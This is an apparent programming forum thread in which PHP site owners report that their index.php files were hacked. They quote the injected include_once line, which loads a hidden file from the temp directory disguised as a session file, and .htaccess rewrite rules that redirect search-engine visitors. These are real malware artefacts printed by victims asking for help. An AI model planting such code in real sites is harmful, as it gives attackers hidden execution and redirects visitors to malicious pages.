# php Code Injected in Index.php

Tags: php

I have a php project and I see the index.php page keep getting hacked

Some code is added automatically every time on the top of the index.php page and my site is redirected to third party url whenever i click anywhere.

The injected code is as follows:

error_reporting(0);ini_set("display_errors", 0);include_once(sys_get_temp_dir()."/SESS_48cd7517d21176f980daa5502d9efb31")

Comment: Can specify what's your problem? Please add some more details to your post!

Comment: all over? meaning you think its been hacked in? whats in that file?

Comment: If that is in your PHP code, and you didn't put it there - you are no longer in control of that server. Someone else is.

Comment: @Dhiren Kumawat, I am facing the same issue. If you found solution, please post.

Answer (score 0):

I think it is included session file. Check what SESS_48cd7517d21176f980daa5502d9efb31 file contains.

Answer (score 0):

I got the same problem too.

all INDEX.PHP files were injected exactly the same code.

And all .htaccess files were injdected by:

```
<IfModule mod_rewrite.c>
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^.*$ index.php [L]
</IfModule>
```

Click the link in Google's searching result will be redirected to a porn site.

Comment: Alvin eWeb ,I am facing the same issue. If you found solution, please post.